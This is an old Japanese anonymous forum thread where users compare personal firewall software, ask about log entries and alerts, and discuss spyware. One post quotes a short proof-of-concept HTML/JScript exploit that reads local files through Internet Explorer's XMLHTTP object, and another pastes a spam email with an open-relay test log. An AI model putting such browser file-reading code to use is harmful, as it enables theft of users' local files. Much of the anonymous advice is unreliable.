Firewall, Zone Alarmは個人使用の場合は無料です。Zone Alarm Pro は有料
です。(Sygate Personal Firewall は無料でも登録するまでは起動するごと
に登録申請画面が出てきます。)三つを導入するとすぐにSygate Personal Fir
ewall が Zone AlarmやBlackICE が「インターネットにアクセスしようとして
いますが、許可しますか」と聞いてきました。私は製品のバージョンアップ情報
でも調べるためにアクセスを求めてきたと思っていましたが、その項目のチェッ
クをはずしていたのでその訳がありません。(製品のバージョンアップ情報をチ
ェックするという項目をオンにしようが、チェックを外そうが関係なくインター
ネットにアクセスを求めてきます。)Zone Alarm はZone Alarm で「Sygate
Personal Firewall がインターネットにアクセスしようとしていますが、許可
しますか」と聞いてきます。それも登録はすでに終わっているにも関わらずです
。ファイアーウォールの主な任務は外部からのコンピュータへの不正アクセスを
監視・遮断することにあるのであって、インターネットにアクセスして自社のサ
ーバーに情報を送ることではないはずです。後で分かったことですが、ファイア
ーウォールも妙な動きをするのです。Zone Alarm や BlackICEも怪しいらし
いのです。ですから複数のファイアーウォールーを入れてお互いに監視させる必
要がある訳ですSygate Personal Firewal の登録申請以外はこれらのファイア
ーウォール のインターネットへのアクセスを許可する必要はまったくありません
。そこまで神経質になる必要はないという人も多いと思いますが、私のコンピュ
ータなのですから、情報の出入りを決めるのは私であってアプリケーションやマ
イクロソフトではないというのが私の立場です。
637:01/10/15 05:45
>636
情報の出入りを決めるのは、OSやアプリケーションであって、
あんたじゃないよ。たぶん。きっと。おそらく。
たまの早起きなのにもう鬱だ

>>636
>自社のサーバーに勝手にアクセスするので
どうやってそれを知ったの?FWが表示してくれた?

>複数のファイアーウォールをインストールする必要があります
多くの人には必要ないです。よい子はまねしないでね

>三つを導入するとすぐに
回線切ってても?ループバックじゃなくて?

>複数のファイアーウォールを入れてお互いに監視させる必要があるわけです。
え?ソフト間に優劣はないの?データの流れは?

>情報の出入りを決めるのは私であって云々・・・
気まぐれでウィルス撒き散らさないでね
>>636
ごめん、ごちゃごちゃしてたから読んでないや
もう一度整理してレスして
640 :01/10/15 22:11
>>636
どこを縦に読むんだ?
641名無しさん@お腹いっぱい。:01/10/15 22:43
三つも四つもいれるぐらいに心配ならルーター使えば。
>>636って暗号じゃないの?
とりあえず>>636がイクロソフトでないことだけは判った
644名無しさん@お腹いっぱい。:01/10/16 21:42
>>636
新たなテロ予告?
指令?
645名無しさん@お腹いっぱい。:01/10/16 22:09
どなたか、 IN に Trojan が出る現象について教えてください。
INなら大丈夫だと聞いた事がありますが、
ZoneAlarmで今まで2回出た事がありまして、不安です…。
>>636
漏れのノートンも、「IE.EXEがインタネットにアクセスしようとしています」
って出ます!!!
ブロッキした方がヨカれすかぁ?!
えへへ
648名無しさん@お腹いっぱい。:01/10/17 22:58
test
649@:01/10/17 22:59
test
650:01/10/17 23:00
test
651名無しさん@お腹いっぱい。:01/10/24 00:34
とりあえず定期ageしとくよ。
652名無しさん@お腹いっぱい。:01/10/24 21:37
ぞぬスレで聞いたんですが答えがなかったので聞きますが
ぞぬの設定にDisrtibuted COM Servicesというのが入ってるけど
これってなんなのかな?
回線につなげる時に許可するかどうか聞かれるんですけど。

既出だったらごめんなさい
653名無しさん@お腹いっぱい。:01/10/24 21:49
ぞぬからNISに変えたら、ぞぬの頃はひっきりなしだった
警告がぱったりこなくなった。NISは有効になってるんだけど
なんか逆に不安。大丈夫なの?
654名無しさん@お腹いっぱい。:01/10/24 21:55
>>652
DCOM が何なのか説明するのはこのスペースじゃむり。
てもインターネットで使うことはまずないので
許可せんでよろしい。

>>653
多分大丈夫。
>>653 心配だったらシマンテックのサイトにセキュリティチェックがあるから試してみて。
656名無しさん@お腹いっぱい。:01/10/24 22:43

Flash Get等のツールで無料版は
スパイウェアと言うのがユーザーに黙って入れられていて
ネットに繋いでる間、時々情報を特定の場所に発信してしまうらしいです(>_<)
メルアドやらどんなHPをよく見てるかとかみんなばれちゃうんですね・・・
ゾーンアラームと言うファイヤーウォールソフト(個人使用なら無料 (-o^)v )を
使ってネット接続中にFlash Getを立ち上げると
何もDLしていないのにいきなり何かを発信してゾーンアラームが
通過を許可するかどうか聞いてきます(もちろん不可 (^^;) )
どうも何か情報を発信して応答が帰ってくると
表示される広告が変わるような感じですねぇ・・・よく解りませんが・・・
でもFlash GetのはADawareとかいうソフトで削除出来るんでまだ良心的(?)です・・・
聞くところによるとREGETのはたちが悪く
一旦削除しても使ってるとREGETがまた勝手にインストールしてしまうとか・・・ (ー_ー;)
そこまでして個人情報を手に入れたいのか?
657652:01/10/24 23:45
>>654さん
お答えありがとうございます
そうですか、では許可しないことにします
ありがとうございました。
658名無しさん@お腹いっぱい。:01/10/27 01:52
age
659名無しさん@お腹いっぱい。:01/10/27 14:59
Sygate4.1を使っていて
http://scan.sygatetech.com/
このサイトのQuick Scanを実行すると、以前はBlockedになっていたのに
いくつかのポートが(80,110,113,139,443,445,1080,2757)
Closedになりました。設定は以前と変えていませんし、スキャン時に
使用しているアプリも同じです。
Stealth Scanだと、全てBlockedになります。
最新版4.2 build872にアップグレードして試しても
結果は同じでした。Quick ScanとStealth Scanでは、スキャン方法が
違うのでしょうか。また、Quick Scanが以前と結果が変わっている
原因のわかる方いるでしょうか。
660名無しさん@お腹いっぱい。:01/11/01 21:01
ZAとZAProどっちがいいですか?どちらも日本語化されてるみたいですが
661名無しさん@お腹いっぱい。:01/11/02 02:52
ファイアウォールソフトを個人向けPC新モデルのほぼ全機種に採用(NEC)(2001.11.1)

https://www.netsecurity.ne.jp/article/10/3187.html
↑このソフトの画面って,ゾヌそのままのような気がするんだけど、ゾヌを日本語に直しただけじゃないのですか?
663名無しさん@お腹いっぱい。:01/11/02 16:30
それは、ぞぬのOEMだよ。
でも、本家のほうが定期的にバージョンUPしてくれる。
買わんほうがいいよ。
664名無しさん@お腹いっぱい。:01/11/03 15:03

Sygate使ってるんだけどデフォルトの設定のままで立ち上げて置くだけで安全?
665名無しさん@お腹いっぱい。:01/11/03 16:16
>>664
んなはずない、どこからそういう考えが生まれるんだ?
666名無しさん@お腹いっぱい。:01/11/03 18:52
なっ、なんと……ちゃんとセキュリティ勉強してこよう…………
667_:01/11/06 14:02
>>664
Sygateならデフォルトでもポートが閉じられてるから大丈夫だよ。
668_:01/11/06 14:26
閉じてるんじゃなくて、ブロックされるのか。
test
670名無しさん@お腹いっぱい。:01/11/06 22:34
クローキングってなんですか?
671名無しさん@お腹いっぱい。:01/11/06 22:50
ネットワークからかくれんぼすることです。
672名無しさん@お腹いっぱい。:01/11/06 23:30
Sygate Personal FireWallが、

「Windows Kernel Core Compornentがなにか送ろうとしているよ」

という警告を出してます。


いまのところ禁止していますが、これってまずいことなんでしょうか。
kernelって何か知らないしこわいです。。
>>672
見てるとSygateもいつの間にか地に墜ちたね。って思った。
age
675名無しさん@お腹いっぱい:01/11/09 15:49
Firewall-1のCVP対応のウィルスサーバソフトを
使っている人いますか?
下記のどれかを導入を検討しているのですが。。。
他にもあったら教えてください。

F-Secure アンチウィルス
http://www.f-secure.co.jp/

Norton AntiVirus For Firewall
http://www.symantec.com/region/jp/enterprise/products.html#virus

InterScanVirusWall
http://www.trendmicro.co.jp/product/isvw/index.asp
WinMXで交換中にZoneAlarm起動したら、途端にDL、ULともに速度が
ゼロに。
ZA立ててからMX起動したら、通信はできてるのに検索リストには
一向に反応がありません。
設定でMXは全部通過にしてるんだけど、なんででしょうか?

WAN側のセキュリティを「高」にしてるからかなぁ…。
677名無しさん@お腹いっぱい。:01/11/09 17:07
>>676
基本的にファイアーウォール等は、ネットの通信を
行ってない時に起動、終了させるもんだよ。

ZoneAlarmを起動させてら、MXを起動させれば
いいんじゃないの?

ZoneAlarmを起動させると通信中のは一旦全て遮断されます。
678名無しさん@お腹いっぱい。:01/11/09 21:03
なるほど、ありがとうございました。

途中でZAが起動してなかったのに気付いたもので。
気をつけます。
679名無しさん@お腹いっぱい。:01/11/13 22:30
ターミナルスレッドあげ
680名無しさん@お腹いっぱい。:01/11/18 06:33
Outpostはどこから落とせば良いの?
682名無しさん@お腹いっぱい。:01/11/18 09:42
95にTINYのせてます。
ためしに、TINYをはずしてShields UP!でスキャンしてみたら、NetBIOSが
OPENになっているとのことでした。
んでしばらくすると、接続されて自PCのnameが表示されちゃいました。
かなりビビりました。

このNetBIOSって通常はOpenになっているものなんですか?
TINYを起動しない状態でNetBIOSを許可しないようにするには、どう設定
すれば良いのでしょうか…
683名無しさん@お腹いっぱい。:01/11/18 10:14
>>682

わかりやすいのはココ。
http://tools.bb.yahoo.co.jp/setup/adsl/security/95.html
Y!BB用のページだが、この内容はプロバイダに関係無く適用できる。
684名無し~3.EXE:01/11/18 16:42
XPのパーソナルファイアウォールどうですか?
685名無しさん@お腹いっぱい。:01/11/18 20:25
XPのファイアウォールの使い方がよくわからん。
ブロックできてるのかなー。
ログには何も残ってないし。
「ドロップされたパケットのログをとる」にチェック入れれば良いんだよね?
あと、詳細設定はどこにチェック入れて良いのかよく分からない。
教えて☆
686682:01/11/18 20:38
>683
ありがとございました。
MicrosoftNetworkのバインドを外せばよかったんですね。

ところで、スレ違いかもしれませんが、TINYを初めて入れたときに
各ソフトの通信を許可するダイアログがでますよね。その時に、常駐
してるrnaappっていうのもネット関連らしいんですが、コレはどういうことを
してるモノなんですか?
常駐させといていいものなんでしょうか。
687名無しさん@お腹いっぱい。:01/11/18 22:02
少しでも重くなると本末転倒だから
ソフトじゃなくてハードがほしいんだけど
完全なやつないかな
688名無しさん@お腹いっぱい。:01/11/19 01:20
お聞きしたいのですが、マック用のフリーのファイア−ウォ−ルソフトってありますでしょうか?
689しろーと:01/11/19 02:34
NIS切ってhttp://scan.sygatetech.com/quickscan.htmlやって
みたら全部「Closed」になったんですけど、本当にファイアーウォ
ールって必要なの?
690名無しさん@お腹いっぱい。:01/11/19 08:14
>>689
ClosedとBlocked(Stealth)の違いを考えれば・・・・・
「んなもん同じだろハゲ」って人はファイアーウォールは
入れない方が良いね、ネットで不都合出るだけになっちゃう
だろうし。
691名無しさん@お腹いっぱい。 :01/11/19 11:30
ファイアウォール以外の設定で、Win98上でポート80を
ステルスにする方法はどうやればいいのでしょう。
692名無しさん@お腹いっぱい。:01/11/21 07:17
207.33.111.34

15分くらいで500回もアタックするってどういうこと?
693名無しさん@お腹いっぱい。:01/11/23 22:19
VB2002のクローキングので1日20回ぐらいあるんですが、
これって普通ですか?
ログのほとんどが、韓国のIPです。
694名無しさん@お腹いっぱい。:01/11/23 22:38
ファイヤーウォールの隠語ってなんでしたっけ??
教えてくださいです。
695名無しさん@お腹いっぱい。:01/11/24 00:15
>>694
「ファーアウォール」

From Windows板

http://pc.2ch.net/test/read.cgi/win/991573646/l50
>>694
ビニール傘
Black ICEを入れたら、OS起動すると必ずネットに接続しようとする。
いったんBlack ICEをアンインストールしたら接続しなくなったのでBlack ICEが原因なのは
わかったんですが、どうしたらOS起動時にBlack ICEが接続しないようになるんでしょう?
フレッツのない地域なので余計な課金が発生してこまってます。
>>697
1.自動接続設定切る。
699697:01/11/24 00:22
>>698
どうも。
>>697
に書き忘れていたことがあります。
ダイアルアップルータでISDNです。
自動接続設定とかは関係ないと思います。
ルータの方の自動発呼をきると不便なので、OS起動時にBlack ICEが接続しないように
したいんですが、どうしたらいいでしょう?
700697:01/11/24 00:24
どうやらBlack ICEが名前解決に逝っているようです。
コレはOFFにできないんでしょうか?
701名無し~3.EXE :01/11/24 22:18
>>697
そのBlackICEはMXで落としたキージェネ付き?
それは木馬にやられてるから

トレンドマイクロ オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp でスキャンしてみ。

ソースはここ。っつーか俺もやられたYO!
◆□◆ 破損、トロイ、ウィルス入り ◆□◆
http://pc.2ch.net/test/read.cgi/download/1000483999/

正規ユーザーならスマソ。
702名無しさん@お腹いっぱい。:01/11/25 00:37
最近Tinyいれましたが

blockedOUT TCP 216.29.191.9:10000

連発してます。モールクンどっとこむだと??
これって何??
703名無しさん@お腹いっぱい。:01/11/25 00:57
>>702
たぶんカウンターじゃないかな?
俺もコレ気になってブロックしてみたらカウンターが表示されなくなった。
704702:01/11/25 01:04
>>703
そーなんだ。じゃDennyしといて放置で
OKですね。。
705Ms.名無しさん:01/11/25 18:17
Tiny入れました。
インターネットに接続するたびに、
以下のPing?が3つ外に出ようとするのですが、
これは何なんでしょうか。

リモート
ALL-ROUTERS.MCAST.NET[224.0.0.2]-ICMP[10]Router Solicitaion
詳細
Aplication from your computer wants to send ICMP packet to ALL-ROUTERS.MCAST.NET[224.0.0.2]
アプリケーションの詳細
tcpip kernel driver

あと、61.123.201.51(日本テレコム株式会社 中国支社?)から
しょっちゅうPort113にアクセスがあるのですが、
これは何をしに来てるんでしょうか。。
706名無しさん@お腹いっぱい。:01/11/26 02:29
>>94
俺もBlackICE入れてんだけど、まったく反応しないよ?
最近フレッツで常時接続になったんだけど
環境がルータ使ってるからなんでしょうか?
エムエックス使用の為静的NAT機能でポート指定とかしてると
アタックとか侵入とかされないの?
707名無しさん@お腹いっぱい。:01/11/26 09:49
ファーアウォール
定期
709ハジメ:01/11/28 08:53
先日、初めてファイアーウオールを入れたんですけど・・・(ZoneAlarmです)
通信中、ブロックしたとのメッセージが出たので、IPドメインサーチしたら、
下のような結果になりました。なんだか、中国の上海にある学校のようです。そこの
HPにも飛べました。何かヤバイのでしょうか?

inetnum: 202.114.224.0 - 202.114.239.255
netname: ZNUFE-CN
descr: zongnan university of finance and economics
country: CN
admin-c: WW3-CN
tech-c: WW3-CN
notify: [email protected]
changed: [email protected] 960501
source: APNIC
>>709
やばいぞそれ!
早くしかるべきところに届けたほうがいい。
>>701
BID25chJ2.exeってやつで、オフィシャルからDLしたものなんだけど、
やっぱり外にパケットを吐いてるよ・・・・
トライアル版でも吐くから何か送ってるのかなぁ
使うのよそうかな・・・・
712Ms.名無しさん:01/12/03 21:42
あげ。
713名無しさん@お腹いっぱい。:01/12/07 18:52
>>1-3が この板全体にとって重要だからage
714Ms.名無しさん:01/12/11 18:58
tiny:フレッツADSLにしたら使えなくなった。
ゾーンアラーム:なんか不安定になる。しょっちゅう電源ブチッ。
Sygate:日本語化パッチがないけど、安定してるし、細かい設定ができてイイ!
715名無しさん@お腹いっぱい。 :01/12/11 23:17
ウチは、快調だけど?????
もしかして「フレッツ接続ツール」なんて糞ソフト使ってるんじゃ
ないんだろうな。。。。(ワラワラ
716名無しさん@お腹いっぱい。:01/12/11 23:45
>>714
715さんの補足なんですけれど,ツールと相性があるらしいです。
flet'sをお使いでも他のPPPoEツールを使うなりWinXPにするなりでtinyは使えます。
NTTが悪いわけではないんです…。RASPPPoE,軽いですしフレッツ接続ツールの
代わりにいかかでしょうか? 接続もファイアウォールも両方軽くなるかと存じます。
717通りすがりさん:01/12/12 00:12
>>711
それは、アタッカの名前逆引きの為に
NetBIOSのパケット吐いてるだけでしょ?

いまどき相手の名前なんてどうでもヨイだろし、
名前解決をしない設定にしてみたら?
(というか、オフィシャルのFAQちゃんと読め)
718名無しさん@お腹いっぱい。:01/12/12 18:19
>>705
それはPingじゃないよ。
じゃあ何だと言われても困るが、そのICMPは気にするな。
プロバイダーとのネットワークの調整みたいなものをやってるんだろ。
719名無しさん@お腹いっぱい。:01/12/16 15:43
たまに 人目につくようにあげておきます
720名無しさん@お腹いっぱい。:01/12/16 18:36
1年くらい前に日本語のファイアーウォールが出て体験版使ってみたんだけど、
なんてソフトか覚えてる人いない?
1万円以上して高すぎって思ったんだけど。
721socks:01/12/17 03:57
http://www.socks.nec.com/

これはどうなんだ?
Windowsユーザは手を出さんだろ
UNIXホストとWindowsクライアント、個人利用なら使わにゃ損だけど

Windowsクライアントに戻そうかな・・・
なんつーかバカの多いスレだな(ワラ

   ∧_∧  / ̄ ̄ ̄ ̄ ̄
  ( ´∀`)< オマエモナー
  (    )  \_____
  | | |
  (__)_)
725名無しさん@お腹いっぱい。:01/12/21 20:36
age
KOREA TELECOM ,おれのPCへの侵入やめてくれ〜〜〜〜〜〜。
61.194.6.73  アタック、PCへの侵入やめてくれ〜〜〜。
728名無しさん@お腹いっぱい。:01/12/22 09:43
sygateのスレはあるのでしょうか?
どなたかリンクしていただけませんでしょうか?
729名無しさん@お腹いっぱい。:01/12/22 09:57
730名無しさん@お腹いっぱい。:01/12/22 10:08
>729
どーもです。
731名無しさん@お腹いっぱい。:01/12/23 03:06
もの凄いアフォな質問かもしれませんが、ぞねを始めとするフリーソフトのFWは、クッキーの管理はできないのでしょうか?
わからないので教えて下さい。
732名無しさん@お腹いっぱい。:01/12/23 06:02
>>731
俺もよくしらないけど、ZONEとかはプログラム毎に良いか駄目かを
設定するだけじゃなかったかな。要するにデータの中身そのものは
チェックしないと思うよ。クッキーを設定したかったらオミトロンは
どうかな、あっちは設定できたと思うよ。
733名無しさん@お腹いっぱい。:01/12/23 13:35
試しにNIS入れてるけど、これってアクセス制御対象のプログラム
のバージョンが上がっても、変更を認識して警告してくれるの?
ZoneAlarmはTrueVectorってので素晴らしい認識だけんど・・。

それとNISってプログラム削除して再インストールしてもHDのどこかに
ゴミ残して期限延長出来ないようにしてる?だとしたら危険なソフトだね。(w
レジストリクリーンソフトで対応できないのだろうか…。
734名無しさん@お腹いっぱい。:01/12/23 13:46
それと、プライバシー制御っていうけど、デフォルトでは
Weferer: LHPQQWOYIYZUNNYCGPKYLEJGDGVCJVTL
Wser-Agent: BXFGGMEPYOQKEDOTWFAOBUZXUWLSZLKBRNVWWCUFPEGAUTFJMVRESKPNKMB
んなの吐き出してるでそ?これって相手方にノートン使ってますよ!
って言ってるようなもので、セキュリティー上はFWが秘匿なのよりは
憂慮すべきことなんじゃないのかな・・・ >ノートン使いさん達?
全ては金払ってからからだ
俺も、金払ってないソフトには、
たとえトロイが入ってても文句は言えんな
737名無しさん@お腹いっぱい。:01/12/23 21:08
ブロックしたときに「ふぁいあーうぉーるっ!」と叫び、
ウィルス検知・処理した時は「黄昏より..云々..うぃるす すれいぶっ!」と叫ぶ、
CV=林原めぐみの、「ウィルス スレイヤーズ でらっくす2002」がほすぃ
>>737
とりあえず、イベントと音声ファイルを対応させてみようよ。
739名無しさん@お腹いっぱい。:01/12/25 23:49
ホスィ!
それが出来た暁には是非CodeRedの亜種も頼む

ただ、漏れは絶対使わない(w

Internet Explorer 6 Allows Local File Reading (XMLHTTP)
http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html
http://www.xs4all.nl/~jkuperus/bug.htm
<html>
<head>
<title>Exploit</title>

<scr!pt language="jscript">

function doIt() {

// open the file on the users harddisk using a http redirect

var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();

alert(xmlhttp.responseText);

}

</script>
</head>
<body>

<button onclick="doIt()">Do it</button>

</body>
</html>
−−−−−
Internet Explorer Document.Open() Without Close() Cookie Stealing, File Reading, and Site Spoofing Bug
http://www.securiteam.com/windowsntfocus/6B00L003FU.html
http://www.osioniusx.com/
友人からDOSアタックを受けているのですが、FireWallで防げるのでしょうか。
当方はWin2kを使用しています。
クソ、新参者だからってなめんなよ。
ふつーDOSアタック仕掛けてくる奴は友人じゃ無いだろ…
744どうよ?:01/12/27 23:17
ZoneAlarm + ノートン2002体験版 + バスター2002体験版 + 黒氷体験版

これで無料&最強!
>742
DoS自体でオチるんなら、面倒みきれません(苦w
>>743,745
742のメール欄見れ。
>>744
ウィルスに破壊される前に、システムエラーの連続で破壊されない事を祈ります(w
748名無しさん@お腹いっぱい。:01/12/28 02:35
さっきからCometUI Module(Internal build)が
インターネットにアクセスしようとしてますと出て怖い。
ダウンロードうっかりしてしまった。危険程度が中程度と出て
ヤバそう。ネットにつなげたらいきなり出てきてしつこい。
いったいなんなのでしょうか?
コピペしようと思ったんですがいくらコピペしようとしてもコピペできない。
749名無しさん@お腹いっぱい。:01/12/28 02:37
Internet Exspoloreがインターネットにアクセスしようと
してますとよく出てきますが、これは何なのでしょうか?
危険程度は低だと出ますが。許可していいのでしょうか?
750 :01/12/28 02:55
BlackICE使ってるんですが一日30回アタックを受けます
常時接続とは言え不安です。
751748:01/12/28 03:02
もう、さっきからずっときてます。いったい何なのでしょうか?
怖いです。
アプリケーションC:¥WINDOWSY SYSTEM¥COMET¥
BIN¥COMET.EXX
プロコリル:TCP(アウトバンド)リモートアドレスfiles.cc.
conetsystems.com(208.178.50.244)
http180)
ローカルアドレス:サービスポート1157
Norton Antivirusをインストールしていません。アプリケーションを
ウイルススキャンできませんでした。
このアプリケーション用の自動設定データはありません。
このアプリケーションはWINDOWSフォルダに入っていて
その会社(Comet System.Inc)は既知の会社のリストにありませんでした。
このアプリケーションにはデジタル署名がないかまたはデジタル署名が
無効です。

と何度も出るんです。怖くてたまりません。
>>749
別スレでも同じ症状が出ているのが書かれている。
まだ、原因はわからないけど、気持ち良いもので無い事は確か。
数ヶ月もすればMicrosoftが「エラーで、情報が漏れていました。致命的なエラー」
とか、発表しそうで怖い。ちょうど、SP1が出るのが3〜5月頃と言う話もあるし…
753名無しさん@お腹いっぱい。:01/12/28 03:11
cometってスパイウェアじゃないの?
Ad-awareでも入れてみたら?
>>750
Pingの回数を全て叩き出しているのなら、個人で差はあるけれどもそれくらいはある。
自己防衛に徹して、最低限の知識を踏まえて、自爆しない限りは、大丈夫だと思う。
BlackICEはアタックを受ける度に出てくるから。
常時接続とは、便利な反面危険も伴う。諸刃の剣。
>>751
>>753の意見に禿同。検討を祈る。
756名無しさん@お腹いっぱい。:01/12/28 03:37
たしかに 金払ってないソフトには、 たとえトロイが入ってても
文句は言えんな

tcp_wrappersとか
757炎壁厨房:02/01/08 22:00
ttp://www.soft4ever.com/LooknStop/En/index.html
↑これってどうよ?
誰か入れれ。
758名無しさん@お腹いっぱい。:02/01/12 09:03
東めた なんでPC覗きにくるの?
759名無しさん@お腹いっぱい。:02/01/12 09:09
>>758
禿げだから。
760 :02/01/22 15:54
      
761_:02/01/25 19:35
先生!
ルーター入れたら不正アクセス全然されなくなったので
FWソフトはずしてもいいですか?
762 :02/01/27 01:50
http://www.introhightech.com/index-5.htm←ここにあるノーハッカーというソフト
っていいんですか?
なんかあんまり聞いたことのないソフトなんですけど・・・。
763名無し:02/01/27 01:51
age

764名無しさん@お腹いっぱい。:02/01/27 15:21
>>762
高かろう悪かろうじゃないだろうね。

使った人いるの?
765765:02/01/31 03:13
ドイツ語わからんすぎて内容が理解できんのですが一応

製品紹介
http://www.tecchannel.de/software/405/index.html
テスト結果の内容
http://www.tecchannel.de/tecdaten/show.php3?navid=2&catid=84&pageid=425
Produktの欄の中にある、長方形の小さな画像をクリックすると詳細が見れる。
なんでドイツ語ファイアウォールを入れたいのかと小一時間。。。
767名無し:02/01/31 03:25
ZoneかOutpostどっちがいいの??
768765:02/01/31 03:31
>>766
いや、そうじゃないんです。
いろんなファイアウォールの性能をテストしているところなんです。
見たところTinyの評価がそんなによくないんで詳細が知りたくなったんです。
マカフィーのはもっと低いけど…
>>768
えぇ・・Tinyの評価かなり高いと思うけど・・(汗

漏れ的評価・・・

Tiny >> ZoneAlarm > Sygate > その他
770769:02/01/31 03:36
あっPFWじゃないけど外からの攻撃には黒氷も(・∀・)イイ!
771765:02/01/31 04:04
総合評価の前になにかいっぱい検査しているのだがよくわからん。

Tinyは Flexibilitat という奴は高い評価
Schutzwirkung というのはまぁまぁみたいだけど
Bedienung というのがボロボロ。

翻訳サイトを探してやってみたけど
Schutzwirkungは保護効果という意味で、Bedienungは評価サービスと言う意味らしい。
高い評価を受けていたFlexibilitat は意味がわからなかった。

ZoneAlarmは保護効果と評価サービスがよく、Flexibilitatはまぁまぁ。
Sygateは保護効果と評価サービスがよいが、Flexibilitatはやや低い。
マカフィーはすべてがやばい。
ちなみにノートンは物凄いがこれはアンチウィルス機能や広告ブロック等がいっぱいついてるからっぽい。

結局Flexibilitatの意味がわからないと実際どれがいいかわからなさそう。
ちなみに2001年7月のものなので。
>>771
「わかりやすさ」じゃね?(w
http://www.logovista.co.jp/trans/text/textframe.html
でFlexibilitatを翻訳したら柔軟性と出た。

Bedienungは↑だとサービスとしか出ないけど、
AltaVistaでEnglishに翻訳してみたらOperationと出た。
操作性って事だと思う。

とにかく2001年7月の評価じゃ古すぎるよね。
774名無しさん@お腹いっぱい。:02/01/31 15:18
まあ自分で使ってみなさいってことだーなあ

Tinyはログがショボイ 2バイト文字のファイルパスに対応してない
775:02/01/31 20:09
>>744
> バスター2002+黒氷
この組み合わせ、落ちませんかぁ... うちの3台まとめてインストールしたら、全部が全部、ブルー画面にも飛ばずに落ちる... 復旧に○一日。(T-T
どっちを削るか!? んで、バスターをあきらめた。
>>775
>>744はネタ
777キリ番ゲッター:02/01/31 20:26
age
778名無しさん@お腹いっぱい。:02/01/31 21:15
Tinyはかなり深いレベル(ドライバ)で動いてる。
MD5認証のプログラムフィルタもあるのでトロイによる他プログラムの騙りも防止できる。

http://members.tripod.co.jp/eazyfox/Firewall/Tiny/architecture.gif
>>778
スタートアップもすごい早い所で起動しますよね。
すっきりデフラグも勝てない。
Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。   
781名無しさん@お腹いっぱい。:02/02/01 23:21
ZAからTinyに乗り換えたのですが、ZAのようなタスクトレイのネットワークインジケーター
がなくってちょっと残念です。
何かフリーで使えるソフトはないっすか?
>>781
接続のプロパティ見とけ あれで十分
TrayMeterとか。
784名無しさん@お腹いっぱい。:02/02/02 01:05
Sygate Personal Firewallが最高だね。

英語分からない馬鹿には使えないだろうけど。

あははは。
785↑自慢?:02/02/02 01:08
 
786名無しさん@お腹いっぱい。:02/02/02 01:34
>>781
これにしとけ。悪くない。
ttp://load.3nopage.com/
787セキュリコ:02/02/02 02:16
>>781
outpostがかなりお勧め。
788名無しさん@お腹いっぱい。:02/02/02 04:16
ZAは馬鹿専用。

Sygate Personal Firewallにしておけ。
789名無しさん@お腹いっぱい。:02/02/02 04:39
sygate vs tiny、勝者はどっち
790名無しさん@お腹いっぱい。:02/02/02 05:46
>>789
tinyだろ。 俺使ってるし。
791あうときゃすと:02/02/02 06:21
あうとぽすとは?
792名無しさん@お腹いっぱい。:02/02/02 06:28
Tiny Personal Firewallを使い始めて気付いたのですが
省電力機能が働かなくなりました。(win98)

対処法ってありますか?
>>781
俺は窓の杜で紹介されてたNet Activity Diagram。
そのまえはTrayMeter使ってた。

http://www.metaproducts.com/
>>788
ZONEは馬鹿専用ってことは
馬鹿でも使えるすぐれものって事?
>>789
Tiny おれも使ってるし。

>>794
その通り。
>794
表現、悪いがZONEはその通り優れたソフトだと思う

今回、TINYにして、その事が良くわかった(昨日導入)
昨日から、一日かかって設定した。
しかし、ICMPってナンダ?の私には難しいぞ

ZONEは、ほどんど、設定いらずだったから

が、軽いのでこのまま、使うことにする

初期起動のリソースが86%になった
WINME H+BEDV TINY 常駐
ZoneAlarmの話する時はProかFree版か付けて欲しい。
798796:02/02/02 14:55
>797
free版です

tinyのlogに
blocked; Out UDP; localhost:68->(null) [210.236.160.75:67]; Owner: C:\WINDOWS\SYSTEM\KRNL386.EXE
とある。

このKRNL386.EXEは正常の動きなんですか。何か問題があるのですか。ウイルススキャンでは白だったのですが。
 今、過去ログを見ているのだけれども・・・・・
799名無しさん@お腹いっぱい。:02/02/02 17:51
Sygateの日本語パッチは無いのでしょうか?
または日本語解説ページでもいいです。
>>798
それは DHCP
Tinyスレの過去ログにも何度も出てる。
せめてOSとか接続環境を書かないと、
遮断するべきかどうかアドバイスできないよ。
801 :02/02/02 19:47
>>799
日本語解説なら…ある。だけど
最低限>>1の内容とリンク先ぐらいは
読んでから質問しようね。
タイニー使い始めて4ヶ月は立つけど今だ設定なんてしてねーよ。
適当適当
( ゚∀゚)あひゃひゃひゃhy
804798:02/02/02 22:01
>>800
解決しました。
アドバイスの通りですね
確かに過去ログにありました。

805名無しさん@お腹いっぱい。:02/02/02 22:05
どのFirewallでネットミ使える?
Tinyはxpが落ちるわ、Outpostは相手の画面見えないわで散々。
どっちもconf.exeに対してAny(TCP,UDP),Both direction ,Permitにしてるのに・・・。
ハァハァ
806ななし:02/02/02 22:12
>>796
Internet Control Message Protocol
通常は必要なし
807名無しさん@お腹いっぱい。:02/02/02 22:34
Tinyも
いいけど、許可したネット系アプリとの相性が悪いとOS落っこちる。
はぅー。
